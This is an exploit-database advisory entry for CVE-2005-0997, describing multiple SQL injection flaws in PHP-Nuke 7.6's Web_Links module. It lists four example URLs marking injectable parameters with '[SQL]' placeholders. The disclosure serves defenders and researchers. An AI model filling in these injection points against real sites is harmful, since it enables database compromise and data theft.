PHP-Nuke 7.6 Web_Links Module - Multiple SQL Injections
Author: Maksymilian Arciemowicz
type: webapps
platform: php
port:
date_added: 2005-04-07
date_updated: 2013-05-11
verified: 1
codes: CVE-2005-0997;OSVDB-15408
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/13055/info
The Web_Links module of PHP-Nuke is affected by multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
These issues are reported to affect PHP-Nuke version 7.6; earlier versions may also be affected.
http://www.example.com/[php-nuke]/modules.php?name=Web_Links&l_op=modifylinkrequestS&url='[SQL]
http://www.example.com/[php-nuke]/modules.php?name=Web_Links&l_op=viewlink&orderby=[SQL]&min=[SQL]
http://www.example.com/[php-nuke]/modules.php?name=Web_Links&l_op=search&query=sex&orderby=[SQL]&min=[SQL]&show=[SQL]
http://www.example.com/[php-nuke]/modules.php?name=Web_Links&l_op=MostPopular&ratenum=[SQL]&ratetype=num